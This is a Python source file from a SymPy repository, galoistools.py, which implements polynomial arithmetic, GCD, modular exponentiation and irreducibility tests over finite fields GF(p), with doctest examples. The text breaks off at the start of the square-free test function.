antepsis/anteplahmacun | refs/heads/master | sympy/polys/galoistools.py | 33 | """Dense univariate polynomials with coefficients in Galois fields. """
from __future__ import print_function, division
from random import uniform
from math import ceil as _ceil, sqrt as _sqrt
from sympy.core.compatibility import SYMPY_INTS, range
from sympy.core.mul import prod
from sympy.polys.polyutils import _sort_factors
from sympy.polys.polyconfig import query
from sympy.polys.polyerrors import ExactQuotientFailed
from sympy.ntheory import factorint
def gf_crt(U, M, K=None):
"""
Chinese Remainder Theorem.
Given a set of integer residues ``u_0,...,u_n`` and a set of
co-prime integer moduli ``m_0,...,m_n``, returns an integer
``u``, such that ``u = u_i mod m_i`` for ``i = ``0,...,n``.
As an example consider a set of residues ``U = [49, 76, 65]``
and a set of moduli ``M = [99, 97, 95]``. Then we have::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_crt
>>> from sympy.ntheory.modular import solve_congruence
>>> gf_crt([49, 76, 65], [99, 97, 95], ZZ)
639985
This is the correct result because::
>>> [639985 % m for m in [99, 97, 95]]
[49, 76, 65]
Note: this is a low-level routine with no error checking.
See Also
========
sympy.ntheory.modular.crt : a higher level crt routine
sympy.ntheory.modular.solve_congruence
"""
p = prod(M, start=K.one)
v = K.zero
for u, m in zip(U, M):
e = p // m
s, _, _ = K.gcdex(e, m)
v += e*(u*s % m)
return v % p
def gf_crt1(M, K):
"""
First part of the Chinese Remainder Theorem.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_crt1
>>> gf_crt1([99, 97, 95], ZZ)
(912285, [9215, 9405, 9603], [62, 24, 12])
"""
E, S = [], []
p = prod(M, start=K.one)
for m in M:
E.append(p // m)
S.append(K.gcdex(E[-1], m)[0] % m)
return p, E, S
def gf_crt2(U, M, p, E, S, K):
"""
Second part of the Chinese Remainder Theorem.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_crt2
>>> U = [49, 76, 65]
>>> M = [99, 97, 95]
>>> p = 912285
>>> E = [9215, 9405, 9603]
>>> S = [62, 24, 12]
>>> gf_crt2(U, M, p, E, S, ZZ)
639985
"""
v = K.zero
for u, m, e, s in zip(U, M, E, S):
v += e*(u*s % m)
return v % p
def gf_int(a, p):
"""
Coerce ``a mod p`` to an integer in the range ``[-p/2, p/2]``.
Examples
========
>>> from sympy.polys.galoistools import gf_int
>>> gf_int(2, 7)
2
>>> gf_int(5, 7)
-2
"""
if a <= p // 2:
return a
else:
return a - p
def gf_degree(f):
"""
Return the leading degree of ``f``.
Examples
========
>>> from sympy.polys.galoistools import gf_degree
>>> gf_degree([1, 1, 2, 0])
3
>>> gf_degree([])
-1
"""
return len(f) - 1
def gf_LC(f, K):
"""
Return the leading coefficient of ``f``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_LC
>>> gf_LC([3, 0, 1], ZZ)
3
"""
if not f:
return K.zero
else:
return f[0]
def gf_TC(f, K):
"""
Return the trailing coefficient of ``f``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_TC
>>> gf_TC([3, 0, 1], ZZ)
1
"""
if not f:
return K.zero
else:
return f[-1]
def gf_strip(f):
"""
Remove leading zeros from ``f``.
Examples
========
>>> from sympy.polys.galoistools import gf_strip
>>> gf_strip([0, 0, 0, 3, 0, 1])
[3, 0, 1]
"""
if not f or f[0]:
return f
k = 0
for coeff in f:
if coeff:
break
else:
k += 1
return f[k:]
def gf_trunc(f, p):
"""
Reduce all coefficients modulo ``p``.
Examples
========
>>> from sympy.polys.galoistools import gf_trunc
>>> gf_trunc([7, -2, 3], 5)
[2, 3, 3]
"""
return gf_strip([ a % p for a in f ])
def gf_normal(f, p, K):
"""
Normalize all coefficients in ``K``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_normal
>>> gf_normal([5, 10, 21, -3], 5, ZZ)
[1, 2]
"""
return gf_trunc(list(map(K, f)), p)
def gf_from_dict(f, p, K):
"""
Create a ``GF(p)[x]`` polynomial from a dict.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_from_dict
>>> gf_from_dict({10: ZZ(4), 4: ZZ(33), 0: ZZ(-1)}, 5, ZZ)
[4, 0, 0, 0, 0, 0, 3, 0, 0, 0, 4]
"""
n, h = max(f.keys()), []
if isinstance(n, SYMPY_INTS):
for k in range(n, -1, -1):
h.append(f.get(k, K.zero) % p)
else:
(n,) = n
for k in range(n, -1, -1):
h.append(f.get((k,), K.zero) % p)
return gf_trunc(h, p)
def gf_to_dict(f, p, symmetric=True):
"""
Convert a ``GF(p)[x]`` polynomial to a dict.
Examples
========
>>> from sympy.polys.galoistools import gf_to_dict
>>> gf_to_dict([4, 0, 0, 0, 0, 0, 3, 0, 0, 0, 4], 5)
{0: -1, 4: -2, 10: -1}
>>> gf_to_dict([4, 0, 0, 0, 0, 0, 3, 0, 0, 0, 4], 5, symmetric=False)
{0: 4, 4: 3, 10: 4}
"""
n, result = gf_degree(f), {}
for k in range(0, n + 1):
if symmetric:
a = gf_int(f[n - k], p)
else:
a = f[n - k]
if a:
result[k] = a
return result
def gf_from_int_poly(f, p):
"""
Create a ``GF(p)[x]`` polynomial from ``Z[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_from_int_poly
>>> gf_from_int_poly([7, -2, 3], 5)
[2, 3, 3]
"""
return gf_trunc(f, p)
def gf_to_int_poly(f, p, symmetric=True):
"""
Convert a ``GF(p)[x]`` polynomial to ``Z[x]``.
Examples
========
>>> from sympy.polys.galoistools import gf_to_int_poly
>>> gf_to_int_poly([2, 3, 3], 5)
[2, -2, -2]
>>> gf_to_int_poly([2, 3, 3], 5, symmetric=False)
[2, 3, 3]
"""
if symmetric:
return [ gf_int(c, p) for c in f ]
else:
return f
def gf_neg(f, p, K):
"""
Negate a polynomial in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_neg
>>> gf_neg([3, 2, 1, 0], 5, ZZ)
[2, 3, 4, 0]
"""
return [ -coeff % p for coeff in f ]
def gf_add_ground(f, a, p, K):
"""
Compute ``f + a`` where ``f`` in ``GF(p)[x]`` and ``a`` in ``GF(p)``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_add_ground
>>> gf_add_ground([3, 2, 4], 2, 5, ZZ)
[3, 2, 1]
"""
if not f:
a = a % p
else:
a = (f[-1] + a) % p
if len(f) > 1:
return f[:-1] + [a]
if not a:
return []
else:
return [a]
def gf_sub_ground(f, a, p, K):
"""
Compute ``f - a`` where ``f`` in ``GF(p)[x]`` and ``a`` in ``GF(p)``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_sub_ground
>>> gf_sub_ground([3, 2, 4], 2, 5, ZZ)
[3, 2, 2]
"""
if not f:
a = -a % p
else:
a = (f[-1] - a) % p
if len(f) > 1:
return f[:-1] + [a]
if not a:
return []
else:
return [a]
def gf_mul_ground(f, a, p, K):
"""
Compute ``f * a`` where ``f`` in ``GF(p)[x]`` and ``a`` in ``GF(p)``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_mul_ground
>>> gf_mul_ground([3, 2, 4], 2, 5, ZZ)
[1, 4, 3]
"""
if not a:
return []
else:
return [ (a*b) % p for b in f ]
def gf_quo_ground(f, a, p, K):
"""
Compute ``f/a`` where ``f`` in ``GF(p)[x]`` and ``a`` in ``GF(p)``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_quo_ground
>>> gf_quo_ground(ZZ.map([3, 2, 4]), ZZ(2), 5, ZZ)
[4, 1, 2]
"""
return gf_mul_ground(f, K.invert(a, p), p, K)
def gf_add(f, g, p, K):
"""
Add polynomials in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_add
>>> gf_add([3, 2, 4], [2, 2, 2], 5, ZZ)
[4, 1]
"""
if not f:
return g
if not g:
return f
df = gf_degree(f)
dg = gf_degree(g)
if df == dg:
return gf_strip([ (a + b) % p for a, b in zip(f, g) ])
else:
k = abs(df - dg)
if df > dg:
h, f = f[:k], f[k:]
else:
h, g = g[:k], g[k:]
return h + [ (a + b) % p for a, b in zip(f, g) ]
def gf_sub(f, g, p, K):
"""
Subtract polynomials in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_sub
>>> gf_sub([3, 2, 4], [2, 2, 2], 5, ZZ)
[1, 0, 2]
"""
if not g:
return f
if not f:
return gf_neg(g, p, K)
df = gf_degree(f)
dg = gf_degree(g)
if df == dg:
return gf_strip([ (a - b) % p for a, b in zip(f, g) ])
else:
k = abs(df - dg)
if df > dg:
h, f = f[:k], f[k:]
else:
h, g = gf_neg(g[:k], p, K), g[k:]
return h + [ (a - b) % p for a, b in zip(f, g) ]
def gf_mul(f, g, p, K):
"""
Multiply polynomials in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_mul
>>> gf_mul([3, 2, 4], [2, 2, 2], 5, ZZ)
[1, 0, 3, 2, 3]
"""
df = gf_degree(f)
dg = gf_degree(g)
dh = df + dg
h = [0]*(dh + 1)
for i in range(0, dh + 1):
coeff = K.zero
for j in range(max(0, i - dg), min(i, df) + 1):
coeff += f[j]*g[i - j]
h[i] = coeff % p
return gf_strip(h)
def gf_sqr(f, p, K):
"""
Square polynomials in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_sqr
>>> gf_sqr([3, 2, 4], 5, ZZ)
[4, 2, 3, 1, 1]
"""
df = gf_degree(f)
dh = 2*df
h = [0]*(dh + 1)
for i in range(0, dh + 1):
coeff = K.zero
jmin = max(0, i - df)
jmax = min(i, df)
n = jmax - jmin + 1
jmax = jmin + n // 2 - 1
for j in range(jmin, jmax + 1):
coeff += f[j]*f[i - j]
coeff += coeff
if n & 1:
elem = f[jmax + 1]
coeff += elem**2
h[i] = coeff % p
return gf_strip(h)
def gf_add_mul(f, g, h, p, K):
"""
Returns ``f + g*h`` where ``f``, ``g``, ``h`` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_add_mul
>>> gf_add_mul([3, 2, 4], [2, 2, 2], [1, 4], 5, ZZ)
[2, 3, 2, 2]
"""
return gf_add(f, gf_mul(g, h, p, K), p, K)
def gf_sub_mul(f, g, h, p, K):
"""
Compute ``f - g*h`` where ``f``, ``g``, ``h`` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_sub_mul
>>> gf_sub_mul([3, 2, 4], [2, 2, 2], [1, 4], 5, ZZ)
[3, 3, 2, 1]
"""
return gf_sub(f, gf_mul(g, h, p, K), p, K)
def gf_expand(F, p, K):
"""
Expand results of :func:`factor` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_expand
>>> gf_expand([([3, 2, 4], 1), ([2, 2], 2), ([3, 1], 3)], 5, ZZ)
[4, 3, 0, 3, 0, 1, 4, 1]
"""
if type(F) is tuple:
lc, F = F
else:
lc = K.one
g = [lc]
for f, k in F:
f = gf_pow(f, k, p, K)
g = gf_mul(g, f, p, K)
return g
def gf_div(f, g, p, K):
"""
Division with remainder in ``GF(p)[x]``.
Given univariate polynomials ``f`` and ``g`` with coefficients in a
finite field with ``p`` elements, returns polynomials ``q`` and ``r``
(quotient and remainder) such that ``f = q*g + r``.
Consider polynomials ``x**3 + x + 1`` and ``x**2 + x`` in GF(2)::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_div, gf_add_mul
>>> gf_div(ZZ.map([1, 0, 1, 1]), ZZ.map([1, 1, 0]), 2, ZZ)
([1, 1], [1])
As result we obtained quotient ``x + 1`` and remainder ``1``, thus::
>>> gf_add_mul(ZZ.map([1]), ZZ.map([1, 1]), ZZ.map([1, 1, 0]), 2, ZZ)
[1, 0, 1, 1]
References
==========
1. [Monagan93]_
2. [Gathen99]_
"""
df = gf_degree(f)
dg = gf_degree(g)
if not g:
raise ZeroDivisionError("polynomial division")
elif df < dg:
return [], f
inv = K.invert(g[0], p)
h, dq, dr = list(f), df - dg, dg - 1
for i in range(0, df + 1):
coeff = h[i]
for j in range(max(0, dg - i), min(df - i, dr) + 1):
coeff -= h[i + j - dg] * g[dg - j]
if i <= dq:
coeff *= inv
h[i] = coeff % p
return h[:dq + 1], gf_strip(h[dq + 1:])
def gf_rem(f, g, p, K):
"""
Compute polynomial remainder in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_rem
>>> gf_rem(ZZ.map([1, 0, 1, 1]), ZZ.map([1, 1, 0]), 2, ZZ)
[1]
"""
return gf_div(f, g, p, K)[1]
def gf_quo(f, g, p, K):
"""
Compute exact quotient in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_quo
>>> gf_quo(ZZ.map([1, 0, 1, 1]), ZZ.map([1, 1, 0]), 2, ZZ)
[1, 1]
>>> gf_quo(ZZ.map([1, 0, 3, 2, 3]), ZZ.map([2, 2, 2]), 5, ZZ)
[3, 2, 4]
"""
df = gf_degree(f)
dg = gf_degree(g)
if not g:
raise ZeroDivisionError("polynomial division")
elif df < dg:
return []
inv = K.invert(g[0], p)
h, dq, dr = f[:], df - dg, dg - 1
for i in range(0, dq + 1):
coeff = h[i]
for j in range(max(0, dg - i), min(df - i, dr) + 1):
coeff -= h[i + j - dg] * g[dg - j]
h[i] = (coeff * inv) % p
return h[:dq + 1]
def gf_exquo(f, g, p, K):
"""
Compute polynomial quotient in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_exquo
>>> gf_exquo(ZZ.map([1, 0, 3, 2, 3]), ZZ.map([2, 2, 2]), 5, ZZ)
[3, 2, 4]
>>> gf_exquo(ZZ.map([1, 0, 1, 1]), ZZ.map([1, 1, 0]), 2, ZZ)
Traceback (most recent call last):
...
ExactQuotientFailed: [1, 1, 0] does not divide [1, 0, 1, 1]
"""
q, r = gf_div(f, g, p, K)
if not r:
return q
else:
raise ExactQuotientFailed(f, g)
def gf_lshift(f, n, K):
"""
Efficiently multiply ``f`` by ``x**n``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_lshift
>>> gf_lshift([3, 2, 4], 4, ZZ)
[3, 2, 4, 0, 0, 0, 0]
"""
if not f:
return f
else:
return f + [K.zero]*n
def gf_rshift(f, n, K):
"""
Efficiently divide ``f`` by ``x**n``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_rshift
>>> gf_rshift([1, 2, 3, 4, 0], 3, ZZ)
([1, 2], [3, 4, 0])
"""
if not n:
return f, []
else:
return f[:-n], f[-n:]
def gf_pow(f, n, p, K):
"""
Compute ``f**n`` in ``GF(p)[x]`` using repeated squaring.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_pow
>>> gf_pow([3, 2, 4], 3, 5, ZZ)
[2, 4, 4, 2, 2, 1, 4]
"""
if not n:
return [K.one]
elif n == 1:
return f
elif n == 2:
return gf_sqr(f, p, K)
h = [K.one]
while True:
if n & 1:
h = gf_mul(h, f, p, K)
n -= 1
n >>= 1
if not n:
break
f = gf_sqr(f, p, K)
return h
def gf_frobenius_monomial_base(g, p, K):
"""
return the list of ``x**(i*p) mod g in Z_p`` for ``i = 0, .., n - 1``
where ``n = gf_degree(g)``
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_frobenius_monomial_base
>>> g = ZZ.map([1, 0, 2, 1])
>>> gf_frobenius_monomial_base(g, 5, ZZ)
[[1], [4, 4, 2], [1, 2]]
"""
n = gf_degree(g)
if n == 0:
return []
b = [0]*n
b[0] = [1]
if p < n:
for i in range(1, n):
mon = gf_lshift(b[i - 1], p, K)
b[i] = gf_rem(mon, g, p, K)
elif n > 1:
b[1] = gf_pow_mod([K.one, K.zero], p, g, p, K)
for i in range(2, n):
b[i] = gf_mul(b[i - 1], b[1], p, K)
b[i] = gf_rem(b[i], g, p, K)
return b
def gf_frobenius_map(f, g, b, p, K):
"""
compute gf_pow_mod(f, p, g, p, K) using the Frobenius map
Parameters
==========
f, g : polynomials in ``GF(p)[x]``
b : frobenius monomial base
p : prime number
K : domain
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_frobenius_monomial_base, gf_frobenius_map
>>> f = ZZ.map([2, 1 , 0, 1])
>>> g = ZZ.map([1, 0, 2, 1])
>>> p = 5
>>> b = gf_frobenius_monomial_base(g, p, ZZ)
>>> r = gf_frobenius_map(f, g, b, p, ZZ)
>>> gf_frobenius_map(f, g, b, p, ZZ)
[4, 0, 3]
"""
m = gf_degree(g)
if gf_degree(f) >= m:
f = gf_rem(f, g, p, K)
if not f:
return []
n = gf_degree(f)
sf = [f[-1]]
for i in range(1, n + 1):
v = gf_mul_ground(b[i], f[n - i], p, K)
sf = gf_add(sf, v, p, K)
return sf
def _gf_pow_pnm1d2(f, n, g, b, p, K):
"""
utility function for ``gf_edf_zassenhaus``
Compute ``f**((p**n - 1) // 2)`` in ``GF(p)[x]/(g)``
``f**((p**n - 1) // 2) = (f*f**p*...*f**(p**n - 1))**((p - 1) // 2)``
"""
f = gf_rem(f, g, p, K)
h = f
r = f
for i in range(1, n):
h = gf_frobenius_map(h, g, b, p, K)
r = gf_mul(r, h, p, K)
r = gf_rem(r, g, p, K)
res = gf_pow_mod(r, (p - 1)//2, g, p, K)
return res
def gf_pow_mod(f, n, g, p, K):
"""
Compute ``f**n`` in ``GF(p)[x]/(g)`` using repeated squaring.
Given polynomials ``f`` and ``g`` in ``GF(p)[x]`` and a non-negative
integer ``n``, efficiently computes ``f**n (mod g)`` i.e. the remainder
of ``f**n`` from division by ``g``, using the repeated squaring algorithm.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_pow_mod
>>> gf_pow_mod(ZZ.map([3, 2, 4]), 3, ZZ.map([1, 1]), 5, ZZ)
[]
References
==========
1. [Gathen99]_
"""
if not n:
return [K.one]
elif n == 1:
return gf_rem(f, g, p, K)
elif n == 2:
return gf_rem(gf_sqr(f, p, K), g, p, K)
h = [K.one]
while True:
if n & 1:
h = gf_mul(h, f, p, K)
h = gf_rem(h, g, p, K)
n -= 1
n >>= 1
if not n:
break
f = gf_sqr(f, p, K)
f = gf_rem(f, g, p, K)
return h
def gf_gcd(f, g, p, K):
"""
Euclidean Algorithm in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_gcd
>>> gf_gcd(ZZ.map([3, 2, 4]), ZZ.map([2, 2, 3]), 5, ZZ)
[1, 3]
"""
while g:
f, g = g, gf_rem(f, g, p, K)
return gf_monic(f, p, K)[1]
def gf_lcm(f, g, p, K):
"""
Compute polynomial LCM in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_lcm
>>> gf_lcm(ZZ.map([3, 2, 4]), ZZ.map([2, 2, 3]), 5, ZZ)
[1, 2, 0, 4]
"""
if not f or not g:
return []
h = gf_quo(gf_mul(f, g, p, K),
gf_gcd(f, g, p, K), p, K)
return gf_monic(h, p, K)[1]
def gf_cofactors(f, g, p, K):
"""
Compute polynomial GCD and cofactors in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_cofactors
>>> gf_cofactors(ZZ.map([3, 2, 4]), ZZ.map([2, 2, 3]), 5, ZZ)
([1, 3], [3, 3], [2, 1])
"""
if not f and not g:
return ([], [], [])
h = gf_gcd(f, g, p, K)
return (h, gf_quo(f, h, p, K),
gf_quo(g, h, p, K))
def gf_gcdex(f, g, p, K):
"""
Extended Euclidean Algorithm in ``GF(p)[x]``.
Given polynomials ``f`` and ``g`` in ``GF(p)[x]``, computes polynomials
``s``, ``t`` and ``h``, such that ``h = gcd(f, g)`` and ``s*f + t*g = h``.
The typical application of EEA is solving polynomial diophantine equations.
Consider polynomials ``f = (x + 7) (x + 1)``, ``g = (x + 7) (x**2 + 1)``
in ``GF(11)[x]``. Application of Extended Euclidean Algorithm gives::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_gcdex, gf_mul, gf_add
>>> s, t, g = gf_gcdex(ZZ.map([1, 8, 7]), ZZ.map([1, 7, 1, 7]), 11, ZZ)
>>> s, t, g
([5, 6], [6], [1, 7])
As result we obtained polynomials ``s = 5*x + 6`` and ``t = 6``, and
additionally ``gcd(f, g) = x + 7``. This is correct because::
>>> S = gf_mul(s, ZZ.map([1, 8, 7]), 11, ZZ)
>>> T = gf_mul(t, ZZ.map([1, 7, 1, 7]), 11, ZZ)
>>> gf_add(S, T, 11, ZZ) == [1, 7]
True
References
==========
1. [Gathen99]_
"""
if not (f or g):
return [K.one], [], []
p0, r0 = gf_monic(f, p, K)
p1, r1 = gf_monic(g, p, K)
if not f:
return [], [K.invert(p1, p)], r1
if not g:
return [K.invert(p0, p)], [], r0
s0, s1 = [K.invert(p0, p)], []
t0, t1 = [], [K.invert(p1, p)]
while True:
Q, R = gf_div(r0, r1, p, K)
if not R:
break
(lc, r1), r0 = gf_monic(R, p, K), r1
inv = K.invert(lc, p)
s = gf_sub_mul(s0, s1, Q, p, K)
t = gf_sub_mul(t0, t1, Q, p, K)
s1, s0 = gf_mul_ground(s, inv, p, K), s1
t1, t0 = gf_mul_ground(t, inv, p, K), t1
return s1, t1, r1
def gf_monic(f, p, K):
"""
Compute LC and a monic polynomial in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_monic
>>> gf_monic(ZZ.map([3, 2, 4]), 5, ZZ)
(3, [1, 4, 3])
"""
if not f:
return K.zero, []
else:
lc = f[0]
if K.is_one(lc):
return lc, list(f)
else:
return lc, gf_quo_ground(f, lc, p, K)
def gf_diff(f, p, K):
"""
Differentiate polynomial in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_diff
>>> gf_diff([3, 2, 4], 5, ZZ)
[1, 2]
"""
df = gf_degree(f)
h, n = [K.zero]*df, df
for coeff in f[:-1]:
coeff *= K(n)
coeff %= p
if coeff:
h[df - n] = coeff
n -= 1
return gf_strip(h)
def gf_eval(f, a, p, K):
"""
Evaluate ``f(a)`` in ``GF(p)`` using Horner scheme.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_eval
>>> gf_eval([3, 2, 4], 2, 5, ZZ)
0
"""
result = K.zero
for c in f:
result *= a
result += c
result %= p
return result
def gf_multi_eval(f, A, p, K):
"""
Evaluate ``f(a)`` for ``a`` in ``[a_1, ..., a_n]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_multi_eval
>>> gf_multi_eval([3, 2, 4], [0, 1, 2, 3, 4], 5, ZZ)
[4, 4, 0, 2, 0]
"""
return [ gf_eval(f, a, p, K) for a in A ]
def gf_compose(f, g, p, K):
"""
Compute polynomial composition ``f(g)`` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_compose
>>> gf_compose([3, 2, 4], [2, 2, 2], 5, ZZ)
[2, 4, 0, 3, 0]
"""
if len(g) <= 1:
return gf_strip([gf_eval(f, gf_LC(g, K), p, K)])
if not f:
return []
h = [f[0]]
for c in f[1:]:
h = gf_mul(h, g, p, K)
h = gf_add_ground(h, c, p, K)
return h
def gf_compose_mod(g, h, f, p, K):
"""
Compute polynomial composition ``g(h)`` in ``GF(p)[x]/(f)``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_compose_mod
>>> gf_compose_mod(ZZ.map([3, 2, 4]), ZZ.map([2, 2, 2]), ZZ.map([4, 3]), 5, ZZ)
[4]
"""
if not g:
return []
comp = [g[0]]
for a in g[1:]:
comp = gf_mul(comp, h, p, K)
comp = gf_add_ground(comp, a, p, K)
comp = gf_rem(comp, f, p, K)
return comp
def gf_trace_map(a, b, c, n, f, p, K):
"""
Compute polynomial trace map in ``GF(p)[x]/(f)``.
Given a polynomial ``f`` in ``GF(p)[x]``, polynomials ``a``, ``b``,
``c`` in the quotient ring ``GF(p)[x]/(f)`` such that ``b = c**t
(mod f)`` for some positive power ``t`` of ``p``, and a positive
integer ``n``, returns a mapping::
a -> a**t**n, a + a**t + a**t**2 + ... + a**t**n (mod f)
In factorization context, ``b = x**p mod f`` and ``c = x mod f``.
This way we can efficiently compute trace polynomials in equal
degree factorization routine, much faster than with other methods,
like iterated Frobenius algorithm, for large degrees.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_trace_map
>>> gf_trace_map([1, 2], [4, 4], [1, 1], 4, [3, 2, 4], 5, ZZ)
([1, 3], [1, 3])
References
==========
1. [Gathen92]_
"""
u = gf_compose_mod(a, b, f, p, K)
v = b
if n & 1:
U = gf_add(a, u, p, K)
V = b
else:
U = a
V = c
n >>= 1
while n:
u = gf_add(u, gf_compose_mod(u, v, f, p, K), p, K)
v = gf_compose_mod(v, v, f, p, K)
if n & 1:
U = gf_add(U, gf_compose_mod(u, V, f, p, K), p, K)
V = gf_compose_mod(v, V, f, p, K)
n >>= 1
return gf_compose_mod(a, V, f, p, K), U
def _gf_trace_map(f, n, g, b, p, K):
"""
utility for ``gf_edf_shoup``
"""
f = gf_rem(f, g, p, K)
h = f
r = f
for i in range(1, n):
h = gf_frobenius_map(h, g, b, p, K)
r = gf_add(r, h, p, K)
r = gf_rem(r, g, p, K)
return r
def gf_random(n, p, K):
"""
Generate a random polynomial in ``GF(p)[x]`` of degree ``n``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_random
>>> gf_random(10, 5, ZZ) #doctest: +SKIP
[1, 2, 3, 2, 1, 1, 1, 2, 0, 4, 2]
"""
return [K.one] + [ K(int(uniform(0, p))) for i in range(0, n) ]
def gf_irreducible(n, p, K):
"""
Generate random irreducible polynomial of degree ``n`` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_irreducible
>>> gf_irreducible(10, 5, ZZ) #doctest: +SKIP
[1, 4, 2, 2, 3, 2, 4, 1, 4, 0, 4]
"""
while True:
f = gf_random(n, p, K)
if gf_irreducible_p(f, p, K):
return f
def gf_irred_p_ben_or(f, p, K):
"""
Ben-Or's polynomial irreducibility test over finite fields.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_irred_p_ben_or
>>> gf_irred_p_ben_or(ZZ.map([1, 4, 2, 2, 3, 2, 4, 1, 4, 0, 4]), 5, ZZ)
True
>>> gf_irred_p_ben_or(ZZ.map([3, 2, 4]), 5, ZZ)
False
"""
n = gf_degree(f)
if n <= 1:
return True
_, f = gf_monic(f, p, K)
if n < 5:
H = h = gf_pow_mod([K.one, K.zero], p, f, p, K)
for i in range(0, n//2):
g = gf_sub(h, [K.one, K.zero], p, K)
if gf_gcd(f, g, p, K) == [K.one]:
h = gf_compose_mod(h, H, f, p, K)
else:
return False
else:
b = gf_frobenius_monomial_base(f, p, K)
H = h = gf_frobenius_map([K.one, K.zero], f, b, p, K)
for i in range(0, n//2):
g = gf_sub(h, [K.one, K.zero], p, K)
if gf_gcd(f, g, p, K) == [K.one]:
h = gf_frobenius_map(h, f, b, p, K)
else:
return False
return True
def gf_irred_p_rabin(f, p, K):
"""
Rabin's polynomial irreducibility test over finite fields.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_irred_p_rabin
>>> gf_irred_p_rabin(ZZ.map([1, 4, 2, 2, 3, 2, 4, 1, 4, 0, 4]), 5, ZZ)
True
>>> gf_irred_p_rabin(ZZ.map([3, 2, 4]), 5, ZZ)
False
"""
n = gf_degree(f)
if n <= 1:
return True
_, f = gf_monic(f, p, K)
x = [K.one, K.zero]
indices = { n//d for d in factorint(n) }
b = gf_frobenius_monomial_base(f, p, K)
h = b[1]
for i in range(1, n):
if i in indices:
g = gf_sub(h, x, p, K)
if gf_gcd(f, g, p, K) != [K.one]:
return False
h = gf_frobenius_map(h, f, b, p, K)
return h == x
_irred_methods = {
'ben-or': gf_irred_p_ben_or,
'rabin': gf_irred_p_rabin,
}
def gf_irreducible_p(f, p, K):
"""
Test irreducibility of a polynomial ``f`` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_irreducible_p
>>> gf_irreducible_p(ZZ.map([1, 4, 2, 2, 3, 2, 4, 1, 4, 0, 4]), 5, ZZ)
True
>>> gf_irreducible_p(ZZ.map([3, 2, 4]), 5, ZZ)
False
"""
method = query('GF_IRRED_METHOD')
if method is not None:
irred = _irred_methods[method](f, p, K)
else:
irred = gf_irred_p_rabin(f, p, K)
return irred
def gf_sqf_p(f, p, K):
"""
Return ``True`` if ``f`` is square-free in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_sqf_p
